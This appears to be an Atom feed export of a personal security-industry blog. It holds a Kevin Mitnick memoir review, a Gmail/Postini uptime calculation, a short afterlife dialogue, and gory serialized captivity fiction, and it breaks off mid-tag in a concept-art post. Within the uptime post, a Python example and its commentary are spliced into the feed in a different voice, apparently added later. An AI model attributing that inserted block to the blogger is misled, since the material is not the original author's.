<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-18579416</id><updated>2012-01-22T22:31:30.075-08:00</updated><category term='RE'/><category term='locks'/><category term='pneumopunk'/><category term='v12n'/><category term='egoblogging'/><category term='books'/><category term='security'/><category term='IT'/><category term='malware'/><category term='secphil'/><category term='spare brain'/><category term='stories'/><category term='review'/><category term='work'/><category term='cloudbaiting'/><category term='OS X sucks'/><title type='text'>ryanlrussell</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><generator version='7.00' 
uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>79</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-18579416.post-2737781782406683321</id><published>2011-10-07T20:47:00.000-07:00</published><updated>2011-10-07T21:21:30.320-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='books'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Ghost in the Wires</title><content type='html'>Ghost in the Wires, Mitnick &amp;amp; Simon&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://rcm.amazon.com/e/cm?t=thievco&amp;amp;o=1&amp;amp;p=8&amp;amp;l=as1&amp;amp;asins=0316037702&amp;amp;ref=tf_til&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" style="width:120px;height:240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;p&gt;Disclaimer: Kevin Mitnick is a personal friend, and this review is based on a late galley copy. I have no financial interest in this book. The above link is an affiliate link.&lt;/p&gt;&lt;p&gt;I have been reading books about Kevin Mitnick for years. Finally, we get to read the best one yet. All of the previous authors worked from information they could glean, and some limited interactions with Kevin himself. The problem is, he was playing most of them a lot of the time. What we have here is Kevin's own version of his story, written himself, along with his collaborator William Simon.&lt;/p&gt;&lt;p&gt;I'll just jump right in; I loved this book. If you have any interest in real-world hacks at all, read it. The other books and news stories didn't cover half of what he did. As I devoured it in two days, I kept turning to people to say "Read this!" 
or repeating one of his stories for co-workers.&lt;/p&gt;&lt;p&gt;I have some clear favorite stories, but I don't want to give any spoilers. It's that much like reading a thriller. My favorites are how he defeated the radio encryption used by the FBI, and how he would go about obtaining a new identity. Specifically, how and where he researched the identities, and got the appropriate document papers.&lt;/p&gt;&lt;p&gt;The sheer audacity that some of his tricks took is amazing to me. He admits things in the first few pages that surprised me. And after reading about how things went with his friends over the years, I finally have some appreciation for why he has such hatred of snitches.&lt;/p&gt;&lt;p&gt;Let's be clear, this is not a technical book like others I have read. He doesn't cover how to exploit a stack overflow. When he breaks into a Solaris box, he says "I used a Solaris exploit." He says that the reason for that was to make it more readable for the general public. And I don't think he's incorrect in that. The focus is story and history.&lt;/p&gt;&lt;p&gt;But even if you're a hard-core technical security person, I think you'll like the book for what it is. Unless you think that security begins and ends with writing a cool exploit. Do I think Kevin has technical skills? I do. But those aren't his greatest powers. Yes, he's a fantastic social engineer. And using those skills, he owned more things and companies than probably anyone else. A 0-day exploit that lets you break into a source control server is impressive. But I don't think it's quite as cool as calling up and getting them to just mail you a tape with the source. There's no patch for stupid.&lt;/p&gt;&lt;p&gt;You'll also enjoy the book if you have an interest in computer or security history like I do. It spans several decades, from when he was a kid interested in magic up to almost present day. There are the cameos from other well-known hackers that have had books written about them as well. 
I have enjoyed reading articles and seeing Twitter exchanges with Kevin and some of his old victims. (All amiable so far as I have seen.)&lt;/p&gt;&lt;p&gt;If you want the most accurate version of the Mitnick story available, here you go.&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2737781782406683321?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2737781782406683321/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2737781782406683321' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2737781782406683321'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2737781782406683321'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2011/10/ghost-in-wires.html' title='Ghost in the Wires'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/01938554978113604206</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1262118305843696490</id><published>2010-04-14T10:43:00.000-07:00</published><updated>2010-04-14T11:38:55.863-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><category scheme='http://www.blogger.com/atom/ns#' term='cloudbaiting'/><title type='text'>Gmail uptime</title><content type='html'>My manager at BigFix was having a discussion with our CFO about Gmail uptime (in the context of our email infrastructure uptime.)&lt;br /&gt;&lt;br /&gt;Using this as a 
data source:&lt;br /&gt;&lt;a href="http://www.google.com/appsstatus#hl=en"&gt;http://www.google.com/appsstatus#hl=en&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;and selecting Google Mail and Postini Services as the items to measure, he arrives at this:&lt;br /&gt;&lt;br /&gt;&lt;style type="text/css"&gt;.nobrtable br { display: none }&lt;/style&gt;&lt;br /&gt;&lt;div class="nobrtable"&gt;&lt;br /&gt;&lt;table&gt;&lt;br /&gt;&lt;tbody&gt;&lt;tr&gt;&lt;br /&gt; &lt;th&gt;Date&lt;/th&gt;&lt;br /&gt; &lt;th&gt;Service&lt;/th&gt;&lt;br /&gt; &lt;th&gt;Duration&lt;/th&gt;&lt;br /&gt; &lt;th&gt;Reason&lt;/th&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;4/9/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Postini&lt;/td&gt;&lt;br /&gt; &lt;td&gt;2:24&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Unspecified Emergency Maintenance&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;4/7/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Core Gmail&lt;/td&gt;&lt;br /&gt; &lt;td&gt;11:20&lt;/td&gt;&lt;br /&gt; &lt;td&gt;HTML mode email down for "a small number of users"&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;4/2/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Postini&lt;/td&gt;&lt;br /&gt; &lt;td&gt;2:08&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Failed Postini update&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;3/16/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Core Gmail&lt;/td&gt;&lt;br /&gt; &lt;td&gt;9:51&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Inbound/Outbound Email was not routing&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;3/15/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Core Gmail&lt;/td&gt;&lt;br /&gt; &lt;td&gt;4:38&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Users unable to access gmail accounts&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;3/10/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Core Gmail&lt;/td&gt;&lt;br /&gt; 
&lt;td&gt;0:50&lt;br /&gt;&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Users unable to access gmail accounts&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;3/8/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Postini&lt;/td&gt;&lt;br /&gt; &lt;td&gt;0:29&lt;br /&gt;&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Anti-Spam not anti-spamming&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;3/4/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Postini&lt;/td&gt;&lt;br /&gt; &lt;td&gt;0:58&lt;br /&gt;&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Anti-Spam not anti-spamming&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;2/25/2010&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Postini&lt;/td&gt;&lt;br /&gt; &lt;td&gt;7:46&lt;br /&gt;&lt;/td&gt;&lt;br /&gt; &lt;td&gt;Users unable to send email&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt; &lt;td&gt;Total&lt;/td&gt;&lt;br /&gt; &lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;br /&gt; &lt;td&gt;40:24&lt;/td&gt;&lt;br /&gt; &lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Total runtime (2 services): 2304 hours&lt;br /&gt;(48 days, 24 hrs/day, 2 services)&lt;br /&gt;&lt;br /&gt;Effective uptime&lt;br /&gt;98.24%&lt;br /&gt; &lt;br /&gt;I have not done my own math here to verify, just thought it would be interesting to share. Note that he gives them twice as many runtime hours since he's counting two services. 
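Those runtime hours are the crux of the calculation, so here is an added example (Python I wrote for this page, not code from the original post) that recomputes the figures from the outage table above under each choice of denominator: the manager's two-service runtime, the halved single-service runtime, and each service on its own, with the result also expressed as a number of "nines". The outage rows are transcribed from the table and the 48-day window is the post's own figure; nothing else is assumed.

```python
"""Availability from an outage log, computed under several denominators.

Added example for this page, not code from the original post. The outage
rows are transcribed from the table in the post; WINDOW_DAYS is the post's
own 48-day measurement window.
"""
import math

# Transcribed from the post's table: (date, service, duration as "H:MM").
OUTAGES = [
    ("4/9/2010",  "Postini", "2:24"),
    ("4/7/2010",  "Gmail",   "11:20"),
    ("4/2/2010",  "Postini", "2:08"),
    ("3/16/2010", "Gmail",   "9:51"),
    ("3/15/2010", "Gmail",   "4:38"),
    ("3/10/2010", "Gmail",   "0:50"),
    ("3/8/2010",  "Postini", "0:29"),
    ("3/4/2010",  "Postini", "0:58"),
    ("2/25/2010", "Postini", "7:46"),
]

WINDOW_DAYS = 48      # measurement window used in the post
HOURS_PER_DAY = 24


def duration_minutes(hhmm):
    """Parse an 'H:MM' duration string into whole minutes."""
    hours, minutes = hhmm.split(":")
    return int(hours) * 60 + int(minutes)


def total_downtime_minutes(outages, service=None):
    """Sum outage minutes, optionally for a single service only."""
    return sum(duration_minutes(d) for _, s, d in outages
               if service is None or s == service)


def availability(downtime_minutes, window_days, services=1):
    """Fraction of scheduled service-minutes that were up.

    services=2 reproduces the post's denominator (two services' worth of
    runtime measured against one combined outage list); services=1 is the
    halved denominator, which doubles the downtime percentage.
    """
    scheduled = window_days * HOURS_PER_DAY * 60 * services
    return 1.0 - downtime_minutes / scheduled


def nines(avail):
    """Number of 'nines' an availability fraction represents (0.999 is 3.0)."""
    return -math.log10(1.0 - avail)


def summary(outages=OUTAGES, window_days=WINDOW_DAYS):
    """Availability in percent and in nines under each denominator choice."""
    combined = total_downtime_minutes(outages)
    rows = {
        "two services, combined outages": availability(combined, window_days, 2),
        "one service, combined outages":  availability(combined, window_days, 1),
        "Gmail only":   availability(total_downtime_minutes(outages, "Gmail"), window_days),
        "Postini only": availability(total_downtime_minutes(outages, "Postini"), window_days),
    }
    return {k: (round(v * 100, 2), round(nines(v), 2)) for k, v in rows.items()}


if __name__ == "__main__":
    total = total_downtime_minutes(OUTAGES)
    print(f"total downtime: {total} min ({total // 60}:{total % 60:02d})")
    for label, (pct, n) in summary().items():
        print(f"{label:32s} {pct:6.2f}%  ({n} nines)")
```

The combined outage time comes to 2424 minutes, the 40:24 in the table. Against the two-service runtime that is 98.25% (the post's 98.24% is the same number truncated rather than rounded), which is well under two nines; halving the runtime hours to a single service's worth roughly doubles the downtime share and drops the figure to about 96.5%. Scoring each service against its own outages only gives about 97.7% for Gmail and 98.8% for Postini, which is the fairer per-service view and still nowhere near the three or four nines people tend to ask for.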
I would tend to halve that, resulting in double the downtime percentage.&lt;br /&gt;&lt;br /&gt;I thank Google for publishing their outage information, by the way.&lt;br /&gt;&lt;br /&gt;Just a data point for the next time someone is asking you for more nines than is reasonable.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1262118305843696490?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1262118305843696490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1262118305843696490' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1262118305843696490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1262118305843696490'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2010/04/gmail-uptime.html' title='Gmail uptime'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/01938554978113604206</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-3852905466235447885</id><published>2010-03-19T13:53:00.000-07:00</published><updated>2010-03-19T14:27:20.440-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Contradiction</title><content type='html'>"They are all correct."&lt;br /&gt;&lt;br /&gt;"How could they ALL be correct? They contradict each other. You can't have Heaven and Valhalla be the afterlife. If Heaven exists then that means that Valhalla doesn't. 
And vice-versa."&lt;br /&gt;&lt;br /&gt;"Think of it as parallel universes."&lt;br /&gt;&lt;br /&gt;"But doesn't the idea of a God transcend multiple universes? Isn't God the god of all universes?"&lt;br /&gt;&lt;br /&gt;"Yes."&lt;br /&gt;&lt;br /&gt;"And so is Zeus?"&lt;br /&gt;&lt;br /&gt;"Yes. Infinite, parallel parallel universes."&lt;br /&gt;&lt;br /&gt;"Which universe is Earth in?"&lt;br /&gt;&lt;br /&gt;"Earth is Earth. The afterlife is different. It is when you change over."&lt;br /&gt;&lt;br /&gt;"So if I'm from Earth, which one do I go to?"&lt;br /&gt;&lt;br /&gt;"It depends on what you believe. You determine where you go, when you cross over."&lt;br /&gt;&lt;br /&gt;"So if I believe in Judeo-Christian Heaven?"&lt;br /&gt;&lt;br /&gt;"Then you go there."&lt;br /&gt;&lt;br /&gt;"But what if I believe in that, but don't think I lived well enough?"&lt;br /&gt;&lt;br /&gt;"Then you go to Hell."&lt;br /&gt;&lt;br /&gt;"Does that mean there isn't a God?"&lt;br /&gt;&lt;br /&gt;"All of the gods are. You go to the one you believe in."&lt;br /&gt;&lt;br /&gt;"What if I believe in reincarnation?"&lt;br /&gt;&lt;br /&gt;"Then you will be reincarnated."&lt;br /&gt;&lt;br /&gt;"On Earth?"&lt;br /&gt;&lt;br /&gt;"On an Earth, yes."&lt;br /&gt;&lt;br /&gt;"What about the atheists?"&lt;br /&gt;&lt;br /&gt;"They cease to be."&lt;br /&gt;&lt;br /&gt;"That doesn't seem fair. They die?"&lt;br /&gt;&lt;br /&gt;"It is what they believe happens. It is what they cause to happen."&lt;br /&gt;&lt;br /&gt;"So if you don't have faith in something, you die?"&lt;br /&gt;&lt;br /&gt;"Faith is not a belief in what might happen. It is what happens. It causes it to happen. If you believe death is the end of your existence, then it is so."&lt;br /&gt;&lt;br /&gt;"So where would I go?"&lt;br /&gt;&lt;br /&gt;"What do you believe?"&lt;br /&gt;&lt;br /&gt;"I don't know, really. I believe... or maybe I hope something happens. 
I always had a hard time believing one church was right and that the others were wrong. Or that any of them were right. I guess I figured I would find out when it happened. I hope I will have a chance to figure it all out afterward."&lt;br /&gt;&lt;br /&gt;"That is how you ended up here."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-3852905466235447885?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/3852905466235447885/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=3852905466235447885' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3852905466235447885'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3852905466235447885'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2010/03/contradiction.html' title='Contradiction'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/01938554978113604206</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7940396395824906375</id><published>2009-11-29T19:31:00.000-08:00</published><updated>2009-11-29T21:04:03.452-08:00</updated><title type='text'>Fixer-Upper</title><content type='html'>Continued from &lt;a href="http://ryanlrussell.blogspot.com/2009/11/welcome-home.html"&gt;Welcome Home&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The sunlight disappeared again, and he assumed he was wheeled into a building. 
He felt several turns and a jolt that he thought must have been his gurney being shoved through a swinging door. He came to a halt, and another bright light painted his face sheet. Very artificial light.&lt;br /&gt;&lt;br /&gt;The sheet was pulled away. More surgical masks this time. There was an overhead light on an articulated arm. Buzzed, muffled voices, one of the masked individuals gestured at the light to another. The latter grabbed a handle on the side of the light with a gloved hand, and aimed it directly into his face, forcing him to squeeze his eyes closed.&lt;br /&gt;&lt;br /&gt;He felt latex-covered fingers prodding his head and neck. A shadow fell over his face, and he opened his eyes to see a masked face with plastic glasses leaning over his, looking into his face. He assumed the face belonged to a surgeon. The mask, glasses, head cover, gown, mostly blue paper said medical to him. The surgeon's head was blocking the flow of light. He could see the surgeon's jaw moving behind the mask, looking at him, talking to him, but all he could hear was the buzzing, muffled sounds. The surgeon gave up, and shook his head "no" to someone beside him.&lt;br /&gt;&lt;br /&gt;The head withdrew and the bright light shut his eyes again. The probing fingers returned, concentrating on his neck. They pressed hard, causing him to flinch from the pressure. Down the side of his neck they poked, until they were partway down his shoulders, where the poking was replaced by a slight pressure or tugging. This was repeated multiple times on each side. Poking hard enough to get a reaction higher up on his neck, and then gentle pressure as they went further down his shoulders.&lt;br /&gt;&lt;br /&gt;He felt fingers at his ears, pulling them in different directions from the outside. He didn't feel them extract whatever had been shoved into his ears that kept him from hearing, but they inserted something cold and hard into his right ear. 
His ear was still numb and the sound was muffled, when he felt a sudden stabbing pain in his ear. He instinctively tried to jerk, but the movement was truncated by the screws that still held his head in place. It didn't stop the stars of pain from lighting up his closed eyes.&lt;br /&gt;&lt;br /&gt;While he was concentrating on stilling himself, the intensity of the light on his face abated. He opened his eyes and blinked away the tears. Looking up, he saw the light was aimed further down his body. He tried to follow with his eyes, but he was lying flat, and there were tubes at his nose and mouth partially blocking his view. He could see the surgeon's side near his face. The surgeon was bent over his body.&lt;br /&gt;&lt;br /&gt;He watched the surgeon take several scalpels in a row, and bend low over him each time. Each time, he would place the bloody scalpel on a tray. He couldn't feel any pain. He realized that he must have been heavily drugged most of the time for days, which is why he couldn't move and was so foggy.&lt;br /&gt;&lt;br /&gt;He didn't have any memory of his capture or injuries. He didn't know who had him, or if they were the ones who did this to him. He had eliminated the possibility that it was just medical personnel. Hospitals don't use military transports, and they don't keep you moving for days before they operate. Unless he dreamed all of that. Unless he'd already received some treatment. But he couldn't have dreamed all of it. He knew they had found him.&lt;br /&gt;&lt;br /&gt;Next the surgeon grabbed some kind of big pliers or clamp. He saw that they opened when the handles were squeezed as the surgeon flexed them. He must have left them in place, because he stood up empty handed. 
He was handed what looked almost like a soldering gun, but when the surgeon pulled the trigger, he could see a small blade vibrate at the end, almost like a tiny skillsaw.&lt;br /&gt;&lt;br /&gt;His eyes went wide when he realized that it was a sternum saw, and that his chest was being cut open. He tried to thrash. The panic made him able to ignore the pain as he writhed and his eyes rolled in his skull. The surgeon stopped momentarily and motioned in his direction with a tilt of his head. From behind, he felt a needle insert into his neck. A slight burning spread up the blood vessel in his neck. The needle was withdrawn, and they unceremoniously dropped the sheet back over his head box.&lt;br /&gt;&lt;br /&gt;As he sank down below consciousness, he thought "why are they keeping me alive?"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-7940396395824906375?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7940396395824906375/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7940396395824906375' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7940396395824906375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7940396395824906375'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2009/11/fixer-upper.html' title='Fixer-Upper'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1997949545677362614</id><published>2009-11-23T15:43:00.000-08:00</published><updated>2009-11-23T17:09:14.439-08:00</updated><title type='text'>Welcome Home</title><content type='html'>I thought I might experiment with some serialized fiction on my blog. I'm trying a slightly different style. I'm going to attempt to be a little gory and disturbing so if that bothers you, fair warning. I'll have a tag for these posts later.&lt;br /&gt;&lt;br /&gt;-- end author's note&lt;br /&gt;&lt;br /&gt;The jolt from the helicopter landing shook him into awareness. Another stab of lightning shot through his head and made his vision go white. Water leaked from behind his eyelids, squeezed tight from the pain. He knew it was a helicopter from the vibrations of the rotors. He had spent a little time on helicopters in his 20's.&lt;br /&gt;&lt;br /&gt;He couldn't tell if it had been days, or a week, or more. He spent much of the time unconscious from pain or drugs. Or not being able to tell the difference between real and imagined. Rarely, he could catch a blurry glimpse of the inside of an ambulance or plane when they would remove his head covering to work on him. If he didn't have an overhead light blinding him.&lt;br /&gt;&lt;br /&gt;Every face he caught sight of during this time was covered with a mask. These ranged from baby-blue or white surgical masks, to Army green and SWAT black gas masks.&lt;br /&gt;&lt;br /&gt;He could tell words were being spoken all around him, but was unable to understand them. Not because they weren't English. He thought they were, from the rhythms of the words. He couldn't understand because they had shoved something in his ears days ago and left it there. Words came to him as a buzzing, scratchy sound. 
The loudest thing in his head was a constant tone, like an old modem trying to sync. He could "hear" the helicopter blades as a vibration in his skull. His ears hurt, but the pain level barely registered above the symphony of hurt that was his head.&lt;br /&gt;&lt;br /&gt;Frightening to him, it was only his head that hurt. He had been able to see down his body twice. Each time, covered and strapped down. The whole time he was in custody, they had him strapped down to a gurney. He thought he had moved his arms and legs a few times while strapped down. Simultaneously light and drug-deadened.&lt;br /&gt;&lt;br /&gt;Tubes ran through his mouth and nose. A machine pumped air in and out of him. He could feel temperatures and pulses slide through the tubes. His head was caged in a scaffold of bars, forming a box. At odd angles to the box were long, spiked screws that drilled directly into his skull, immobilizing him. The entire box was draped with a sheet.&lt;br /&gt;&lt;br /&gt;Shadows across the sheet indicated that there were men at the sides of his gurney. It started to shake, and then it felt like he was rolling. He imagined fabric straps being released from the floor and walls and his wheels being unlocked. He was rolled towards what must be the helicopter door, and hoisted by his pall bearers. He floated through the air briefly until his wheels made contact with ground again. There was a qualitative difference between rolling on the steel floor of a vehicle and the rough pavement or concrete he rolled on now.&lt;br /&gt;&lt;br /&gt;As he rolled, the shadow line suddenly crossed his sheet, and bright light illuminated his covering. He could immediately tell the sunlight from the artificial lights he'd been under. 
The warmth and color were unmistakable.&lt;br /&gt;&lt;br /&gt;It was the last time he would ever see sunlight with his own eyes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1997949545677362614?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1997949545677362614/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1997949545677362614' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1997949545677362614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1997949545677362614'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2009/11/welcome-home.html' title='Welcome Home'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4288414193702354258</id><published>2009-05-11T21:22:00.001-07:00</published><updated>2009-05-11T21:28:53.658-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pneumopunk'/><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Concept Art</title><content type='html'>Some concept art for a project I'm working on with my oldest son. 
He's the artist, not I.&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6zLjPetI/AAAAAAAAACs/qC5yQkzg08A/s1600-h/concept80001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 157px;" src="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6zLjPetI/AAAAAAAAACs/qC5yQkzg08A/s400/concept80001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789515801230034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6tEPXZRI/AAAAAAAAACk/DMefHN6mm0Q/s1600-h/concept70001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 310px;" src="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6tEPXZRI/AAAAAAAAACk/DMefHN6mm0Q/s400/concept70001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789410759599378" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_ZPESRkoUdM8/Sgj6ojaOYHI/AAAAAAAAACc/l71VtZhU35o/s1600-h/concept60001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 246px;" 